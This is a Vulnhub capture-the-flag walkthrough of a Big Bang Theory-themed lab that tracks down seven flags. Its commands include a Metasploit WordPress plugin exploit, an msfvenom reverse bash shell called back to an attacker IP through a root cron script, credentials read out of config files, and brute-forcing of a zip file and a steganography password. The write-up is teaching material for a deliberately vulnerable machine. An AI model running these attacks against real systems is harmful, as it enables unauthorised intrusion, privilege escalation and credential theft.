CTF Challenges

TBBT: FunWithFlags: Vulnhub Walkthrough

Introduction

Today, we are going to complete a Capture The Flag challenge hosted on Vulnhub. This lab is based on a popular CBS series: The Big Bang Theory and as I am a huge fan of this show, it’s gonna fun to solve it. This lab is developed by emargkos and you can download it from here. This lab is a combination of capture the flag challenge and boot2root which means we have to find flags and root the lab; seven flags are hidden in the lab.

Penetration Testing Methodology

  • Flag #1: Sheldon
    • Nmap Scan
  • Flag #2: Amy
    • Browsing HTTP Service
    • Directory Bruteforce
    • Enumeration using WPScan
    • Exploiting Vulnerable Plugin
    • Getting Meterpreter
    • Downloading Binary File
    • Reading Flag using Strings
  • Flag #3: Penny
    • Enumerating Directories
    • Decoding Base64
    • Reading Flag
  • Flag #4: Leonard
    • Enumerating Directories
    • Enumerating Crontab
    • Crafting Payload using Msfvenom
    • Uploading Payload
    • Getting Root Shell
    • Reading Flag
  • Flag #5: Bernadette
    • Enumerating Directories
    • Grabbing Database Credentials
    • Enumerating Database
    • Reading Flag
  • Flag #6: Raj
    • Enumerating Directories
    • Grabbing Database Credentials
    • Enumerating Tables
    • Reading Flag
  • Flag #7: Howard
    • Enumerating FTP Service
    • Downloading Locked Archive File
    • Brute-forcing Password using fcrackzip
    • Brute-forcing Password using stegcracker
    • Reading Flag

Walkthrough

Flag #1: Sheldon

As DHCP is disabled in this machine, we have ourselves a static IP Address. It is 192.168.1.105. Let’s start pawning the lab, firstly by scanning it and for the scan, we will use nmap with the following command:

nmap -p- -A 192.168.1.105

Nmap showed us that various ports are open with multiple services running on them. These ports are 21(FTP), 22(SSH), 80(HTTP), 1337. If we look closer at the port 1337, we found our first flag i.e. Sheldon.

FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}

Flag #2: Amy

Moving on, we opened the target IP address in the browser and here we found an image as shown below:

Apart from Sheldon’s creepy smile and Penny’s sarcastic bung, all that there was on this page was this image. So, to proceed forward with the directory bruteforce. We used the dirb tool for the same.

dirb http://192.168.1.105

Without taking much time, our reliable dirb gave was a directory /music/wordpress/. It is a pretty odd directory to find. But if the machine is based on Big Bang theory then who are we to judge. We decided to browse the URL.

https://192.168.1.105/music/wordpress

As we got wordpress directory, and the web-page that opened up seems to be made in WordPress. It was only natural to enumerate WordPress. For this task, we decided to use WPScan.

wpscan --url http://192.168.1.105/music/wordpress/

 In no time, we have got ourselves a vulnerable plugin on our hands. It is the world-famous reflex-gallery.

Our experience with this plugin tells us that we have a perfect exploit for this plugin in our Metasploit Framework. Let’s get ourselves a sweet meterpreter.

use exploit/unix/webapp/wp_reflex_file_upload
set rhosts 192.168.1.105
set target uri /music/wordpress
exploit
cd /home
ls
cd amy
ls
cat notes.txt
download secretdiary /root/Desktop/

We got our metepreter in the blink of an eye. Now that we have a shell. We need to enumerate the machine for another flag. We traversed in the home directory of the current user. Here we listed the contents to find ourselves a directory named amy/. First Sheldon then Amy. This is turning out to be a nice path for flags. We enter the amy/ directory and we find 2 files here. We read the text file named notes using the cat command. It tells us that another file named secretdiary is Amy’s diary. But no need to be happy. The notes say that once she is famous she will write secrets in it. Like that’s gonna happen any time sooner. We are told that Amy used a very strong password that cannot be brute-forced. It is 18 digit, alphanumeric, uppercase/lowercase with symbols. How kind of Amy to tell us what the password is made up of. Also, we are told that the program is compiled. That means that it is a binary. We need to figure out another approach towards it. But it is not gonna do any good sitting there. So, we downloaded the secretdiary to our attacker machine.

Now that we have the secretdiary on our hands, we need to figure out a way to get the password to unlock it. As it is a binary file, there must be a location where the password is stored. Since it a text inside a binary file, we need the strings command to read from it.

strings secretdiary

We can see that we have the password, “P@SSw0rd123Sh3ld0n”. Sorry to say Amy but is not a strong password. I recommend that you change it. But strings command has done more than it was asked. It gave us the amy flag. So, we don’t need to log in.

FLAG-amy{60263777358690b90e8dbe8fea6943c9}

Flag #3: Penny

We went back to the meterpreter and went back to the home directory. We saw that there were a lot of directories. But we decided we need the Penny flag. So, we traversed into the penny directory. We listed the contents of this directory to find a hidden file called .FLAG.penny.txt. Come on! we wanted it to be tougher. We read the file to find a base64 encoded text.

cd penny
ls
cat .FLAG.penny.txt

We copied the encoded text and went back to our attacker machine. Here, we decoded the text using the echo command. It gave us the penny flag. 3 Flags down!!

echo "<hash>" | base64 -d

FLAG-penny{dace52bdb2a0b3f899dfb3423a992b25}

Flag #4: Leonard

Time to go back to the home directory. Here we traversed into the Leonard directory. Let’s see if Leonard is good at hiding his flag. We listed the contents of this directory to find a script. Interesting! We read the script. There was no script. Typical Leonard. It says that they have a thermostat connected to the IoT device. This means that the script can manipulate the temperature. As we all know that Sheldon needs to keep his thermostat at 71 degrees. This is uncomfortable for Leonard. So, this script will change the temperature to Leonard’s preference every minute. I smell corn!

cd leonard
ls
cat thermostat_set_temp.sh

Time to check the crontab. As suspected, we have this script inside the crontab file. It is scheduled to run every minute.

cat /etc/crontab

 If we are not wrong, this might give us root. Let’s wait and watch. Time to craft a raw bash payload using the msfvenom.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.111 lport=1234 R

We copied the payload on our clipboard and used the echo command to paste the payload inside an empty file having the same name as Leonard’s script.

echo "<payload>" > thermostat_set_temp.sh

All that’s left to do is upload this script from our machine to the target machine. As we have a meterpreter this can be done using the upload command.

upload /root/thermostat_set_temp.sh
ls
cat thermostat_set_temp.sh

Before uploading, we started a listener at the port that we mentioned at the time of crafting the payload. Now after we upload the payload, we got to wait a minute for the cronjob to execute the script. In no time we have a session. We used the id command to gain information about the user. We have the root shell. Now for the flag. It was in the current directory. We read the flag using the cat command. We have the message that we can sit on Sheldon’s spot. Dreams do come true!!

nc -lvp 1234
id
cd /root
ls
cat Flag-leonard.txt

FLAG-leonard{17fc95224b65286941c54747704acd3e}

Flag #5: Bernadette

But, although we have the root shell, it doesn’t mean that the challenge is over. We need to find other flags as well. We went back to our meterpreter shell and started enumerating. This led us to the /var/www/html/ directory. Here, we found a directory named private. How can we not open it? SO! we saw that we have a bunch of HTML and php files. Among them was the db_config.php file. If our experience servers us right, the config file mostly stores the database password. We decided to take a look. Bazinga!! We have the Database credentials.

User: bigpharmacorp

Pass: weareevil

Word of Wisdom: If you are a Big Pharma Company don’t keep your password weareevil. This would have been our First Guess.

ls
cd private
ls
cat db_config.php

We went back to our root shell that we obtained just a while ago. Here, we ran the python one-liner to convert the shell into a TTY shell. As soon as we got the proper shell. We attacked the Database using the credentials that we dug up. We used the queries to inquire about the databases and tables. Here we found different users, their password and in Bernadette’s description, we have our 5th Flag!!

python -c 'import pty;pty.spawn("/bin/bash")'
mysql -u bigpharmacorp -p
weareevil
show databases;
use bigpharmacorp;
show tables;
select * from users;

FLAG-bernadette{f42d950ab0e966198b66a5c719832d5f}

Flag #6: Raj

Since we got this flag inside the database. It scratched a part of our brain that we might have another database user. Then it hit us that we have wordpress installed. WordPress creates its users. We went on the hunt for that user. We traversed into the directory containing the wordpress. Here we found the wp-config.php. How convenient! We read the file using cat command. We found ourselves some credentials.

User: footprintsonthemoon

Pass: footprintsonthemoon1337

Now, who will keep such a password? It must be our Indian brother Raj!! Let’s get that flag.

cd /var/www/html/music/wordpress
ls
cat wp-config.php

 We logged out from the previous database and logged in using the new credentials. We enumerated almost all the tables. But we won’t take you on that painstaking journey. We found something in the wp_post table.

mysql -u footprintsonthemoon
footprintsonthemoon1337
show databases
use footprintsonthemoon;
show tables;

If you read the data form the wp_post table, you will find the Raz flag tucked in between. 

FLAG-raz{40d17a74e28a62eac2df19e206f0987c}

Flag #7: Howard

We enumerated further, but we didn’t get anything new. So we went back to our initial nmap scan. We remembered that we have a port 21 open as well. So let’s login to the FTP. We logged in as Anonymous User. Here we listed the files to find a directory named pub. Now, everyone is in the pub including Amy, Bernadette, Howard, Leonard, Penny, Raj, and Sheldon. They must be here to witness as we capture the last flag. Until now we don’t have any flag from Howard. Let’s check his directory. In this, we have a note file and a compressed archive. We figured that we that the zip file was the to be focused so, we downloaded it using the get command.

ftp 192.168.1.105
ls
cd pub
ls
cd howard
ls
get super_secret_nasa_stuff_here.zip
bye

The archive was password-protected, so we decided to use fcrackzip on it. We brute-forced using the rockyou.txt. It gave us the password. It was the “astronaut”. Damn! Could have guessed that one. We unzipped the archive to find ourselves an image. Hmm.

fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt super_secret_nasa_stuff_here.zip
unzip super_secret_nasa_stuff.zip

It didn’t take much time before we figured out that the flag must be hidden inside the image. We used the stegcracker to bruteforce it using rockyou. It cracked us the password “iloveyoumom”. How very Howardy!! Well, all that left is read the flag from the file that stagcracker created. This gave us the Howard flag!!

stegcracker /root/marsroversketch.jpg /usr/share/wordlists/rockyou.txt
cat /root/marsroversketch.jpg.out

This concludes this lab. But can we leave without saying “It all started with the big bang!”.

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the Covid-19. Take Care and be Healthy and Keep Hacking!!

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here